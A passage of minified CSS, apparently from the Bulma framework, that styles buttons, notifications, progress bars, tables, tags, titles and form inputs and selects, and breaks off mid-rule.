.button.is-danger.is-inverted.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-danger.is-light{background-color:#feecf0;color:#cc0f35}.button.is-danger.is-light:hover,.button.is-danger.is-light.is-hovered{background-color:#fde0e6;border-color:transparent;color:#cc0f35}.button.is-danger.is-light:active,.button.is-danger.is-light.is-active{background-color:#fcd4dc;border-color:transparent;color:#cc0f35}.button.is-small{font-size:.75rem}.button.is-small:not(.is-rounded){border-radius:2px}.button.is-normal{font-size:1rem}.button.is-medium{font-size:1.25rem}.button.is-large{font-size:1.5rem}.button[disabled],fieldset[disabled] .button{background-color:#fff;border-color:#dbdbdb;box-shadow:none;opacity:.5}.button.is-fullwidth{display:flex;width:100%}.button.is-loading{color:transparent!important;pointer-events:none}.button.is-loading:after{position:absolute;left:calc(50% - .5em);top:calc(50% - .5em);position:absolute!important}.button.is-static{background-color:#f5f5f5;border-color:#dbdbdb;color:#7a7a7a;box-shadow:none;pointer-events:none}.button.is-rounded{border-radius:9999px;padding-left:1.25em;padding-right:1.25em}.buttons{align-items:center;display:flex;flex-wrap:wrap;justify-content:flex-start}.buttons .button{margin-bottom:.5rem}.buttons .button:not(:last-child):not(.is-fullwidth){margin-right:.5rem}.buttons:last-child{margin-bottom:-.5rem}.buttons:not(:last-child){margin-bottom:1rem}.buttons.are-small .button:not(.is-normal):not(.is-medium):not(.is-large){font-size:.75rem}.buttons.are-small .button:not(.is-normal):not(.is-medium):not(.is-large):not(.is-rounded){border-radius:2px}.buttons.are-medium .button:not(.is-small):not(.is-normal):not(.is-large){font-size:1.25rem}.buttons.are-large .button:not(.is-small):not(.is-normal):not(.is-medium){font-size:1.5rem}.buttons.has-addons .button:not(:first-child){border-bottom-left-radius:0;border-top-left-radius:0}.buttons.has-addons .button:not(:last-child){border-bottom-right-radius:0;border-top-right-radius:0;margin-right:-1px}.buttons.has-addons .button:last-child{margin-right:0}.buttons.has-addons .button:hover,.buttons.has-addons .button.is-hovered{z-index:2}.buttons.has-addons .button:focus,.buttons.has-addons .button.is-focused,.buttons.has-addons .button:active,.buttons.has-addons .button.is-active,.buttons.has-addons .button.is-selected{z-index:3}.buttons.has-addons .button:focus:hover,.buttons.has-addons .button.is-focused:hover,.buttons.has-addons .button:active:hover,.buttons.has-addons .button.is-active:hover,.buttons.has-addons .button.is-selected:hover{z-index:4}.buttons.has-addons .button.is-expanded{flex-grow:1;flex-shrink:1}.buttons.is-centered{justify-content:center}.buttons.is-centered:not(.has-addons) .button:not(.is-fullwidth){margin-left:.25rem;margin-right:.25rem}.buttons.is-right{justify-content:flex-end}.buttons.is-right:not(.has-addons) .button:not(.is-fullwidth){margin-left:.25rem;margin-right:.25rem}@media screen and (max-width: 768px){.button.is-responsive.is-small{font-size:.5625rem}.button.is-responsive,.button.is-responsive.is-normal{font-size:.65625rem}.button.is-responsive.is-medium{font-size:.75rem}.button.is-responsive.is-large{font-size:1rem}}@media screen and (min-width: 769px) and (max-width: 1023px){.button.is-responsive.is-small{font-size:.65625rem}.button.is-responsive,.button.is-responsive.is-normal{font-size:.75rem}.button.is-responsive.is-medium{font-size:1rem}.button.is-responsive.is-large{font-size:1.25rem}}.container{flex-grow:1;margin:0 auto;position:relative;width:auto}.container.is-fluid{max-width:none!important;padding-left:32px;padding-right:32px;width:100%}@media screen and (min-width: 1024px){.container{max-width:960px}}@media screen and (max-width: 1215px){.container.is-widescreen:not(.is-max-desktop){max-width:1152px}}@media screen and (max-width: 1407px){.container.is-fullhd:not(.is-max-desktop):not(.is-max-widescreen){max-width:1344px}}@media screen and (min-width: 1216px){.container:not(.is-max-desktop){max-width:1152px}}@media screen and (min-width: 1408px){.container:not(.is-max-desktop):not(.is-max-widescreen){max-width:1344px}}.content li+li{margin-top:.25em}.content p:not(:last-child),.content dl:not(:last-child),.content ol:not(:last-child),.content ul:not(:last-child),.content blockquote:not(:last-child),.content pre:not(:last-child),.content table:not(:last-child){margin-bottom:1em}.content h1,.content h2,.content h3,.content h4,.content h5,.content h6{color:#363636;font-weight:600;line-height:1.125}.content h1{font-size:2em;margin-bottom:.5em}.content h1:not(:first-child){margin-top:1em}.content h2{font-size:1.75em;margin-bottom:.5714em}.content h2:not(:first-child){margin-top:1.1428em}.content h3{font-size:1.5em;margin-bottom:.6666em}.content h3:not(:first-child){margin-top:1.3333em}.content h4{font-size:1.25em;margin-bottom:.8em}.content h5{font-size:1.125em;margin-bottom:.8888em}.content h6{font-size:1em;margin-bottom:1em}.content blockquote{background-color:#f5f5f5;border-left:5px solid #dbdbdb;padding:1.25em 1.5em}.content ol{list-style-position:outside;margin-left:2em;margin-top:1em}.content ol:not([type]){list-style-type:decimal}.content ol:not([type]).is-lower-alpha{list-style-type:lower-alpha}.content ol:not([type]).is-lower-roman{list-style-type:lower-roman}.content ol:not([type]).is-upper-alpha{list-style-type:upper-alpha}.content ol:not([type]).is-upper-roman{list-style-type:upper-roman}.content ul{list-style:disc outside;margin-left:2em;margin-top:1em}.content ul ul{list-style-type:circle;margin-top:.5em}.content ul ul ul{list-style-type:square}.content dd{margin-left:2em}.content figure{margin-left:2em;margin-right:2em;text-align:center}.content figure:not(:first-child){margin-top:2em}.content figure:not(:last-child){margin-bottom:2em}.content figure img{display:inline-block}.content figure figcaption{font-style:italic}.content pre{-webkit-overflow-scrolling:touch;overflow-x:auto;padding:1.25em 1.5em;white-space:pre;word-wrap:normal}.content sup,.content sub{font-size:75%}.content table{width:100%}.content table td,.content table th{border:1px solid #dbdbdb;border-width:0 0 1px;padding:.5em .75em;vertical-align:top}.content table th{color:#363636}.content table th:not([align]){text-align:inherit}.content table thead td,.content table thead th{border-width:0 0 2px;color:#363636}.content table tfoot td,.content table tfoot th{border-width:2px 0 0;color:#363636}.content table tbody tr:last-child td,.content table tbody tr:last-child th{border-bottom-width:0}.content .tabs li+li{margin-top:0}.content.is-small{font-size:.75rem}.content.is-normal{font-size:1rem}.content.is-medium{font-size:1.25rem}.content.is-large{font-size:1.5rem}.icon{align-items:center;display:inline-flex;justify-content:center;height:1.5rem;width:1.5rem}.icon.is-small{height:1rem;width:1rem}.icon.is-medium{height:2rem;width:2rem}.icon.is-large{height:3rem;width:3rem}.icon-text{align-items:flex-start;color:inherit;display:inline-flex;flex-wrap:wrap;line-height:1.5rem;vertical-align:top}.icon-text .icon{flex-grow:0;flex-shrink:0}.icon-text .icon:not(:last-child){margin-right:.25em}.icon-text .icon:not(:first-child){margin-left:.25em}div.icon-text{display:flex}.image{display:block;position:relative}.image img{display:block;height:auto;width:100%}.image img.is-rounded{border-radius:9999px}.image.is-fullwidth{width:100%}.image.is-square img,.image.is-square .has-ratio,.image.is-1by1 img,.image.is-1by1 .has-ratio,.image.is-5by4 img,.image.is-5by4 .has-ratio,.image.is-4by3 img,.image.is-4by3 .has-ratio,.image.is-3by2 img,.image.is-3by2 .has-ratio,.image.is-5by3 img,.image.is-5by3 .has-ratio,.image.is-16by9 img,.image.is-16by9 .has-ratio,.image.is-2by1 img,.image.is-2by1 .has-ratio,.image.is-3by1 img,.image.is-3by1 .has-ratio,.image.is-4by5 img,.image.is-4by5 .has-ratio,.image.is-3by4 img,.image.is-3by4 .has-ratio,.image.is-2by3 img,.image.is-2by3 .has-ratio,.image.is-3by5 img,.image.is-3by5 .has-ratio,.image.is-9by16 img,.image.is-9by16 .has-ratio,.image.is-1by2 img,.image.is-1by2 .has-ratio,.image.is-1by3 img,.image.is-1by3 .has-ratio{height:100%;width:100%}.image.is-square,.image.is-1by1{padding-top:100%}.image.is-5by4{padding-top:80%}.image.is-4by3{padding-top:75%}.image.is-3by2{padding-top:66.6666%}.image.is-5by3{padding-top:60%}.image.is-16by9{padding-top:56.25%}.image.is-2by1{padding-top:50%}.image.is-3by1{padding-top:33.3333%}.image.is-4by5{padding-top:125%}.image.is-3by4{padding-top:133.3333%}.image.is-2by3{padding-top:150%}.image.is-3by5{padding-top:166.6666%}.image.is-9by16{padding-top:177.7777%}.image.is-1by2{padding-top:200%}.image.is-1by3{padding-top:300%}.image.is-16x16{height:16px;width:16px}.image.is-24x24{height:24px;width:24px}.image.is-32x32{height:32px;width:32px}.image.is-48x48{height:48px;width:48px}.image.is-64x64{height:64px;width:64px}.image.is-96x96{height:96px;width:96px}.image.is-128x128{height:128px;width:128px}.notification{background-color:#f5f5f5;border-radius:4px;position:relative;padding:1.25rem 2.5rem 1.25rem 1.5rem}.notification a:not(.button):not(.dropdown-item){color:currentColor;text-decoration:underline}.notification strong{color:currentColor}.notification code,.notification pre{background:white}.notification pre code{background:transparent}.notification>.delete{right:.5rem;position:absolute;top:.5rem}.notification .title,.notification .subtitle,.notification .content{color:currentColor}.notification.is-white{background-color:#fff;color:#0a0a0a}.notification.is-black{background-color:#0a0a0a;color:#fff}.notification.is-light{background-color:#f5f5f5;color:#000000b3}.notification.is-dark{background-color:#363636;color:#fff}.notification.is-primary{background-color:#00d1b2;color:#fff}.notification.is-primary.is-light{background-color:#ebfffc;color:#00947e}.notification.is-link{background-color:#485fc7;color:#fff}.notification.is-link.is-light{background-color:#eff1fa;color:#3850b7}.notification.is-info{background-color:#3e8ed0;color:#fff}.notification.is-info.is-light{background-color:#eff5fb;color:#296fa8}.notification.is-success{background-color:#48c78e;color:#fff}.notification.is-success.is-light{background-color:#effaf5;color:#257953}.notification.is-warning{background-color:#ffe08a;color:#000000b3}.notification.is-warning.is-light{background-color:#fffaeb;color:#946c00}.notification.is-danger{background-color:#f14668;color:#fff}.notification.is-danger.is-light{background-color:#feecf0;color:#cc0f35}.progress{-moz-appearance:none;-webkit-appearance:none;border:none;border-radius:9999px;display:block;height:1rem;overflow:hidden;padding:0;width:100%}.progress::-webkit-progress-bar{background-color:#ededed}.progress::-webkit-progress-value{background-color:#4a4a4a}.progress::-moz-progress-bar{background-color:#4a4a4a}.progress::-ms-fill{background-color:#4a4a4a;border:none}.progress.is-white::-webkit-progress-value{background-color:#fff}.progress.is-white::-moz-progress-bar{background-color:#fff}.progress.is-white::-ms-fill{background-color:#fff}.progress.is-white:indeterminate{background-image:linear-gradient(to right,white 30%,#ededed 30%)}.progress.is-black::-webkit-progress-value{background-color:#0a0a0a}.progress.is-black::-moz-progress-bar{background-color:#0a0a0a}.progress.is-black::-ms-fill{background-color:#0a0a0a}.progress.is-black:indeterminate{background-image:linear-gradient(to right,#0a0a0a 30%,#ededed 30%)}.progress.is-light::-webkit-progress-value{background-color:#f5f5f5}.progress.is-light::-moz-progress-bar{background-color:#f5f5f5}.progress.is-light::-ms-fill{background-color:#f5f5f5}.progress.is-light:indeterminate{background-image:linear-gradient(to right,whitesmoke 30%,#ededed 30%)}.progress.is-dark::-webkit-progress-value{background-color:#363636}.progress.is-dark::-moz-progress-bar{background-color:#363636}.progress.is-dark::-ms-fill{background-color:#363636}.progress.is-dark:indeterminate{background-image:linear-gradient(to right,#363636 30%,#ededed 30%)}.progress.is-primary::-webkit-progress-value{background-color:#00d1b2}.progress.is-primary::-moz-progress-bar{background-color:#00d1b2}.progress.is-primary::-ms-fill{background-color:#00d1b2}.progress.is-primary:indeterminate{background-image:linear-gradient(to right,#00d1b2 30%,#ededed 30%)}.progress.is-link::-webkit-progress-value{background-color:#485fc7}.progress.is-link::-moz-progress-bar{background-color:#485fc7}.progress.is-link::-ms-fill{background-color:#485fc7}.progress.is-link:indeterminate{background-image:linear-gradient(to right,#485fc7 30%,#ededed 30%)}.progress.is-info::-webkit-progress-value{background-color:#3e8ed0}.progress.is-info::-moz-progress-bar{background-color:#3e8ed0}.progress.is-info::-ms-fill{background-color:#3e8ed0}.progress.is-info:indeterminate{background-image:linear-gradient(to right,#3e8ed0 30%,#ededed 30%)}.progress.is-success::-webkit-progress-value{background-color:#48c78e}.progress.is-success::-moz-progress-bar{background-color:#48c78e}.progress.is-success::-ms-fill{background-color:#48c78e}.progress.is-success:indeterminate{background-image:linear-gradient(to right,#48c78e 30%,#ededed 30%)}.progress.is-warning::-webkit-progress-value{background-color:#ffe08a}.progress.is-warning::-moz-progress-bar{background-color:#ffe08a}.progress.is-warning::-ms-fill{background-color:#ffe08a}.progress.is-warning:indeterminate{background-image:linear-gradient(to right,#ffe08a 30%,#ededed 30%)}.progress.is-danger::-webkit-progress-value{background-color:#f14668}.progress.is-danger::-moz-progress-bar{background-color:#f14668}.progress.is-danger::-ms-fill{background-color:#f14668}.progress.is-danger:indeterminate{background-image:linear-gradient(to right,#f14668 30%,#ededed 30%)}.progress:indeterminate{-webkit-animation-duration:1.5s;animation-duration:1.5s;-webkit-animation-iteration-count:infinite;animation-iteration-count:infinite;-webkit-animation-name:moveIndeterminate;animation-name:moveIndeterminate;-webkit-animation-timing-function:linear;animation-timing-function:linear;background-color:#ededed;background-image:linear-gradient(to right,#4a4a4a 30%,#ededed 30%);background-position:top left;background-repeat:no-repeat;background-size:150% 150%}.progress:indeterminate::-webkit-progress-bar{background-color:transparent}.progress:indeterminate::-moz-progress-bar{background-color:transparent}.progress:indeterminate::-ms-fill{animation-name:none}.progress.is-small{height:.75rem}.progress.is-medium{height:1.25rem}.progress.is-large{height:1.5rem}@-webkit-keyframes moveIndeterminate{0%{background-position:200% 0}to{background-position:-200% 0}}@keyframes moveIndeterminate{0%{background-position:200% 0}to{background-position:-200% 0}}.table{background-color:#fff;color:#363636}.table td,.table th{border:1px solid #dbdbdb;border-width:0 0 1px;padding:.5em .75em;vertical-align:top}.table td.is-white,.table th.is-white{background-color:#fff;border-color:#fff;color:#0a0a0a}.table td.is-black,.table th.is-black{background-color:#0a0a0a;border-color:#0a0a0a;color:#fff}.table td.is-light,.table th.is-light{background-color:#f5f5f5;border-color:#f5f5f5;color:#000000b3}.table td.is-dark,.table th.is-dark{background-color:#363636;border-color:#363636;color:#fff}.table td.is-primary,.table th.is-primary{background-color:#00d1b2;border-color:#00d1b2;color:#fff}.table td.is-link,.table th.is-link{background-color:#485fc7;border-color:#485fc7;color:#fff}.table td.is-info,.table th.is-info{background-color:#3e8ed0;border-color:#3e8ed0;color:#fff}.table td.is-success,.table th.is-success{background-color:#48c78e;border-color:#48c78e;color:#fff}.table td.is-warning,.table th.is-warning{background-color:#ffe08a;border-color:#ffe08a;color:#000000b3}.table td.is-danger,.table th.is-danger{background-color:#f14668;border-color:#f14668;color:#fff}.table td.is-narrow,.table th.is-narrow{white-space:nowrap;width:1%}.table td.is-selected,.table th.is-selected{background-color:#00d1b2;color:#fff}.table td.is-selected a,.table td.is-selected strong,.table th.is-selected a,.table th.is-selected strong{color:currentColor}.table td.is-vcentered,.table th.is-vcentered{vertical-align:middle}.table th{color:#363636}.table th:not([align]){text-align:left}.table tr.is-selected{background-color:#00d1b2;color:#fff}.table tr.is-selected a,.table tr.is-selected strong{color:currentColor}.table tr.is-selected td,.table tr.is-selected th{border-color:#fff;color:currentColor}.table thead{background-color:transparent}.table thead td,.table thead th{border-width:0 0 2px;color:#363636}.table tfoot{background-color:transparent}.table tfoot td,.table tfoot th{border-width:2px 0 0;color:#363636}.table tbody{background-color:transparent}.table tbody tr:last-child td,.table tbody tr:last-child th{border-bottom-width:0}.table.is-bordered td,.table.is-bordered th{border-width:1px}.table.is-bordered tr:last-child td,.table.is-bordered tr:last-child th{border-bottom-width:1px}.table.is-fullwidth{width:100%}.table.is-hoverable tbody tr:not(.is-selected):hover{background-color:#fafafa}.table.is-hoverable.is-striped tbody tr:not(.is-selected):hover{background-color:#fafafa}.table.is-hoverable.is-striped tbody tr:not(.is-selected):hover:nth-child(2n){background-color:#f5f5f5}.table.is-narrow td,.table.is-narrow th{padding:.25em .5em}.table.is-striped tbody tr:not(.is-selected):nth-child(2n){background-color:#fafafa}.table-container{-webkit-overflow-scrolling:touch;overflow:auto;overflow-y:hidden;max-width:100%}.tags{align-items:center;display:flex;flex-wrap:wrap;justify-content:flex-start}.tags .tag{margin-bottom:.5rem}.tags .tag:not(:last-child){margin-right:.5rem}.tags:last-child{margin-bottom:-.5rem}.tags:not(:last-child){margin-bottom:1rem}.tags.are-medium .tag:not(.is-normal):not(.is-large){font-size:1rem}.tags.are-large .tag:not(.is-normal):not(.is-medium){font-size:1.25rem}.tags.is-centered{justify-content:center}.tags.is-centered .tag{margin-right:.25rem;margin-left:.25rem}.tags.is-right{justify-content:flex-end}.tags.is-right .tag:not(:first-child){margin-left:.5rem}.tags.is-right .tag:not(:last-child){margin-right:0}.tags.has-addons .tag{margin-right:0}.tags.has-addons .tag:not(:first-child){margin-left:0;border-top-left-radius:0;border-bottom-left-radius:0}.tags.has-addons .tag:not(:last-child){border-top-right-radius:0;border-bottom-right-radius:0}.tag:not(body){align-items:center;background-color:#f5f5f5;border-radius:4px;color:#4a4a4a;display:inline-flex;font-size:.75rem;height:2em;justify-content:center;line-height:1.5;padding-left:.75em;padding-right:.75em;white-space:nowrap}.tag:not(body) .delete{margin-left:.25rem;margin-right:-.375rem}.tag:not(body).is-white{background-color:#fff;color:#0a0a0a}.tag:not(body).is-black{background-color:#0a0a0a;color:#fff}.tag:not(body).is-light{background-color:#f5f5f5;color:#000000b3}.tag:not(body).is-dark{background-color:#363636;color:#fff}.tag:not(body).is-primary{background-color:#00d1b2;color:#fff}.tag:not(body).is-primary.is-light{background-color:#ebfffc;color:#00947e}.tag:not(body).is-link{background-color:#485fc7;color:#fff}.tag:not(body).is-link.is-light{background-color:#eff1fa;color:#3850b7}.tag:not(body).is-info{background-color:#3e8ed0;color:#fff}.tag:not(body).is-info.is-light{background-color:#eff5fb;color:#296fa8}.tag:not(body).is-success{background-color:#48c78e;color:#fff}.tag:not(body).is-success.is-light{background-color:#effaf5;color:#257953}.tag:not(body).is-warning{background-color:#ffe08a;color:#000000b3}.tag:not(body).is-warning.is-light{background-color:#fffaeb;color:#946c00}.tag:not(body).is-danger{background-color:#f14668;color:#fff}.tag:not(body).is-danger.is-light{background-color:#feecf0;color:#cc0f35}.tag:not(body).is-normal{font-size:.75rem}.tag:not(body).is-medium{font-size:1rem}.tag:not(body).is-large{font-size:1.25rem}.tag:not(body) .icon:first-child:not(:last-child){margin-left:-.375em;margin-right:.1875em}.tag:not(body) .icon:last-child:not(:first-child){margin-left:.1875em;margin-right:-.375em}.tag:not(body) .icon:first-child:last-child{margin-left:-.375em;margin-right:-.375em}.tag:not(body).is-delete{margin-left:1px;padding:0;position:relative;width:2em}.tag:not(body).is-delete:before,.tag:not(body).is-delete:after{background-color:currentColor;content:"";display:block;left:50%;position:absolute;top:50%;transform:translate(-50%) translateY(-50%) rotate(45deg);transform-origin:center center}.tag:not(body).is-delete:before{height:1px;width:50%}.tag:not(body).is-delete:after{height:50%;width:1px}.tag:not(body).is-delete:hover,.tag:not(body).is-delete:focus{background-color:#e8e8e8}.tag:not(body).is-delete:active{background-color:#dbdbdb}.tag:not(body).is-rounded{border-radius:9999px}a.tag:hover{text-decoration:underline}.title,.subtitle{word-break:break-word}.title em,.title span,.subtitle em,.subtitle span{font-weight:inherit}.title sub,.subtitle sub,.title sup,.subtitle sup{font-size:.75em}.title .tag,.subtitle .tag{vertical-align:middle}.title{color:#363636;font-size:2rem;font-weight:600;line-height:1.125}.title strong{color:inherit;font-weight:inherit}.title:not(.is-spaced)+.subtitle{margin-top:-1.25rem}.title.is-1{font-size:3rem}.title.is-2{font-size:2.5rem}.title.is-3{font-size:2rem}.title.is-4{font-size:1.5rem}.title.is-5{font-size:1.25rem}.title.is-6{font-size:1rem}.title.is-7{font-size:.75rem}.subtitle{color:#4a4a4a;font-size:1.25rem;font-weight:400;line-height:1.25}.subtitle strong{color:#363636;font-weight:600}.subtitle:not(.is-spaced)+.title{margin-top:-1.25rem}.subtitle.is-1{font-size:3rem}.subtitle.is-2{font-size:2.5rem}.subtitle.is-3{font-size:2rem}.subtitle.is-4{font-size:1.5rem}.subtitle.is-5{font-size:1.25rem}.subtitle.is-6{font-size:1rem}.subtitle.is-7{font-size:.75rem}.heading{display:block;font-size:11px;letter-spacing:1px;margin-bottom:5px;text-transform:uppercase}.number{align-items:center;background-color:#f5f5f5;border-radius:9999px;display:inline-flex;font-size:1.25rem;height:2em;justify-content:center;margin-right:1.5rem;min-width:2.5em;padding:.25rem .5rem;text-align:center;vertical-align:top}.input,.textarea,.select select{background-color:#fff;border-color:#dbdbdb;border-radius:4px;color:#363636}.input::-moz-placeholder,.textarea::-moz-placeholder,.select select::-moz-placeholder{color:#3636364d}.input::-webkit-input-placeholder,.textarea::-webkit-input-placeholder,.select select::-webkit-input-placeholder{color:#3636364d}.input:-moz-placeholder,.textarea:-moz-placeholder,.select select:-moz-placeholder{color:#3636364d}.input:-ms-input-placeholder,.textarea:-ms-input-placeholder,.select select:-ms-input-placeholder{color:#3636364d}.input:hover,.textarea:hover,.select select:hover,.is-hovered.input,.is-hovered.textarea,.select select.is-hovered{border-color:#b5b5b5}.input:focus,.textarea:focus,.select select:focus,.is-focused.input,.is-focused.textarea,.select select.is-focused,.input:active,.textarea:active,.select select:active,.is-active.input,.is-active.textarea,.select select.is-active{border-color:#485fc7;box-shadow:0 0 0 .125em #485fc740}.input[disabled],.textarea[disabled],.select select[disabled],fieldset[disabled] .input,fieldset[disabled] .textarea,fieldset[disabled] .select select,.select fieldset[disabled] select{background-color:#f5f5f5;border-color:#f5f5f5;box-shadow:none;color:#7a7a7a}.input[disabled]::-moz-placeholder,.textarea[disabled]::-moz-placeholder,.select select[disabled]::-moz-placeholder,fieldset[disabled] .input::-moz-placeholder,fieldset[disabled] .textarea::-moz-placeholder,fieldset[disabled] .select select::-moz-placeholder,.select fieldset[disabled] select::-moz-placeholder{color:#7a7a7a4d}.input[disabled]::-webkit-input-placeholder,.textarea[disabled]::-webkit-input-placeholder,.select select[disabled]::-webkit-input-placeholder,fieldset[disabled] .input::-webkit-input-placeholder,fieldset[disabled] .textarea::-webkit-input-placeholder,fieldset[disabled] .select select::-webkit-input-placeholder,.select fieldset[disabled] select::-webkit-input-placeholder{color:#7a7a7a4d}.input[disabled]:-moz-placeholder,.textarea[disabled]:-moz-placeholder,.select select[disabled]:-moz-placeholder,fieldset[disabled] .input:-moz-placeholder,fieldset[disabled] .textarea:-moz-placeholder,fieldset[disabled] .select select:-moz-placeholder,.select fieldset[disabled] select:-moz-placeholder{color:#7a7a7a4d}.input[disabled]:-ms-input-placeholder,.textarea[disabled]:-ms-input-placeholder,.select select[disabled]:-ms-input-placeholder,fieldset[disabled] .input:-ms-input-placeholder,fieldset[disabled] .textarea:-ms-input-placeholder,fieldset[disabled] .select select:-ms-input-placeholder,.select fieldset[disabled] select:-ms-input-placeholder{color:#7a7a7a4d}.input,.textarea{box-shadow:inset 0 .0625em .125em #0a0a0a0d;max-width:100%;width:100%}.input[readonly],.textarea[readonly]{box-shadow:none}.is-white.input,.is-white.textarea{border-color:#fff}.is-white.input:focus,.is-white.textarea:focus,.is-white.is-focused.input,.is-white.is-focused.textarea,.is-white.input:active,.is-white.textarea:active,.is-white.is-active.input,.is-white.is-active.textarea{box-shadow:0 0 0 .125em #ffffff40}.is-black.input,.is-black.textarea{border-color:#0a0a0a}.is-black.input:focus,.is-black.textarea:focus,.is-black.is-focused.input,.is-black.is-focused.textarea,.is-black.input:active,.is-black.textarea:active,.is-black.is-active.input,.is-black.is-active.textarea{box-shadow:0 0 0 .125em #0a0a0a40}.is-light.input,.is-light.textarea{border-color:#f5f5f5}.is-light.input:focus,.is-light.textarea:focus,.is-light.is-focused.input,.is-light.is-focused.textarea,.is-light.input:active,.is-light.textarea:active,.is-light.is-active.input,.is-light.is-active.textarea{box-shadow:0 0 0 .125em #f5f5f540}.is-dark.input,.is-dark.textarea{border-color:#363636}.is-dark.input:focus,.is-dark.textarea:focus,.is-dark.is-focused.input,.is-dark.is-focused.textarea,.is-dark.input:active,.is-dark.textarea:active,.is-dark.is-active.input,.is-dark.is-active.textarea{box-shadow:0 0 0 .125em #36363640}.is-primary.input,.is-primary.textarea{border-color:#00d1b2}.is-primary.input:focus,.is-primary.textarea:focus,.is-primary.is-focused.input,.is-primary.is-focused.textarea,.is-primary.input:active,.is-primary.textarea:active,.is-primary.is-active.input,.is-primary.is-active.textarea{box-shadow:0 0 0 .125em #00d1b240}.is-link.input,.is-link.textarea{border-color:#485fc7}.is-link.input:focus,.is-link.textarea:focus,.is-link.is-focused.input,.is-link.is-focused.textarea,.is-link.input:active,.is-link.textarea:active,.is-link.is-active.input,.is-link.is-active.textarea{box-shadow:0 0 0 .125em #485fc740}.is-info.input,.is-info.textarea{border-color:#3e8ed0}.is-info.input:focus,.is-info.textarea:focus,.is-info.is-focused.input,.is-info.is-focused.textarea,.is-info.input:active,.is-info.textarea:active,.is-info.is-active.input,.is-info.is-active.textarea{box-shadow:0 0 0 .125em #3e8ed040}.is-success.input,.is-success.textarea{border-color:#48c78e}.is-success.input:focus,.is-success.textarea:focus,.is-success.is-focused.input,.is-success.is-focused.textarea,.is-success.input:active,.is-success.textarea:active,.is-success.is-active.input,.is-success.is-active.textarea{box-shadow:0 0 0 .125em #48c78e40}.is-warning.input,.is-warning.textarea{border-color:#ffe08a}.is-warning.input:focus,.is-warning.textarea:focus,.is-warning.is-focused.input,.is-warning.is-focused.textarea,.is-warning.input:active,.is-warning.textarea:active,.is-warning.is-active.input,.is-warning.is-active.textarea{box-shadow:0 0 0 .125em #ffe08a40}.is-danger.input,.is-danger.textarea{border-color:#f14668}.is-danger.input:focus,.is-danger.textarea:focus,.is-danger.is-focused.input,.is-danger.is-focused.textarea,.is-danger.input:active,.is-danger.textarea:active,.is-danger.is-active.input,.is-danger.is-active.textarea{box-shadow:0 0 0 .125em #f1466840}.is-small.input,.is-small.textarea{border-radius:2px;font-size:.75rem}.is-medium.input,.is-medium.textarea{font-size:1.25rem}.is-large.input,.is-large.textarea{font-size:1.5rem}.is-fullwidth.input,.is-fullwidth.textarea{display:block;width:100%}.is-inline.input,.is-inline.textarea{display:inline;width:auto}.input.is-rounded{border-radius:9999px;padding-left:calc(1.125em - 1px);padding-right:calc(1.125em - 1px)}.input.is-static{background-color:transparent;border-color:transparent;box-shadow:none;padding-left:0;padding-right:0}.textarea{display:block;max-width:100%;min-width:100%;padding:calc(.75em - 1px);resize:vertical}.textarea:not([rows]){max-height:40em;min-height:8em}.textarea[rows]{height:initial}.textarea.has-fixed-size{resize:none}.checkbox,.radio{cursor:pointer;display:inline-block;line-height:1.25;position:relative}.checkbox input,.radio input{cursor:pointer}.checkbox:hover,.radio:hover{color:#363636}.checkbox[disabled],.radio[disabled],fieldset[disabled] .checkbox,fieldset[disabled] .radio,.checkbox input[disabled],.radio input[disabled]{color:#7a7a7a;cursor:not-allowed}.radio+.radio{margin-left:.5em}.select{display:inline-block;max-width:100%;position:relative;vertical-align:top}.select:not(.is-multiple){height:2.5em}.select:not(.is-multiple):not(.is-loading):after{border-color:#485fc7;right:1.125em;z-index:4}.select.is-rounded select{border-radius:9999px;padding-left:1em}.select select{cursor:pointer;display:block;font-size:1em;max-width:100%;outline:none}.select select::-ms-expand{display:none}.select select[disabled]:hover,fieldset[disabled] .select select:hover{border-color:#f5f5f5}.select select:not([multiple]){padding-right:2.5em}.select select[multiple]{height:auto;padding:0}.select select[multiple] option{padding:.5em 1em}.select:not(.is-multiple):not(.is-loading):hover:after{border-color:#363636}.select.is-white:not(:hover):after{border-color:#fff}.select.is-white select{border-color:#fff}.select.is-white select:hover,.select.is-white select.is-hovered{border-color:#f2f2f2}.select.is-white select:focus,.select.is-white select.is-focused,.select.is-white select:active,.select.is-white select.is-active{box-shadow:0 0 0 .125em #ffffff40}.select.is-black:not(:hover):after{border-color:#0a0a0a}.select.is-black select{border-color:#0a0a0a}.select.is-black select:hover,.select.is-black select.is-hovered{border-color:#000}.select.is-black select:focus,.select.is-black select.is-focused,.select.is-black select:active,.select.is-black select.is-active{box-shadow:0 0 0 .125em #0a0a0a40}.select.is-light:not(:hover):after{border-color:#f5f5f5}.select.is-light select{border-color:#f5f5f5}.select.is-light select:hover,.select.is-light select.is-hovered{border-color:#e8e8e8}.select.is-light select:focus,.select.is-light select.is-focused,.select.is-light select:active,.select.is-light select.is-active{box-shadow:0 0 0 .125em #f5f5f540}.select.is-dark:not(:hover):after{border-color:#363636}.select.is-dark select{border-color:#363636}.select.is-dark select:hover,.select.is-dark select.is-hovered{border-color:#292929}.select.is-dark select:focus,.select.is-dark select.is-focused,.select.is-dark select:active,.select.is-dark select.is-active{box-shadow:0 0 0 .125em #36363640}.select.is-primary:not(:hover):after{border-color:#00d1b2}.select.is-primary select{border-color:#00d1b2}.select.is-primary select:hover,.select.is-primary select.is-hovered{border-color:#00b89c}.select.is-primary select:focus,.select.is-primary select.is-focused,.select.is-primary select:active,.select.is-primary select.is-active{box-shadow:0 0 0 .125em #00d1b240}.select.is-link:not(:hover):after{border-color:#485fc7}.select.is-link select{border-color:#485fc7}.select.is-link select:hover,.select.is-link select.is-hovered{border-color:#3a51bb}.select.is-link select:focus,.select.is-link select.is-focused,.select.is-link select:active,.select.is-link select.is-active{box-shadow:0 0 0 .125em #485fc740}.select.is-info:not(:hover):after{border-color:#3e8ed0}.select.is-info select{border-color:#3e8ed0}.select.is-info select:hover,.select.is-info select.is-hovered{border-color:#3082c5}.select.is-info select:focus,.select.is-info select.is-focused,.select.is-info select:active,.select.is-info select.is-active{box-shadow:0 0 0 .125em #3e8ed040}.select.is-success:not(:hover):after{border-color:#48c78e}.select.is-success select{border-color:#48c78e}.select.is-success select:hover,.select.is-success select.is-hovered{border-color:#3abb81}.select.is-success select:focus,.select.is-success select.is-focused,.select.is-success select:active,.select.is-success select.is-active{box-shadow:0 0 0 .125em #48c78e40}.select.is-warning:not(:hover):after{border-color:#ffe08a}.select.is-warning select{border-color:#ffe08a}.select.is-warning select:hover,.select.is-warning 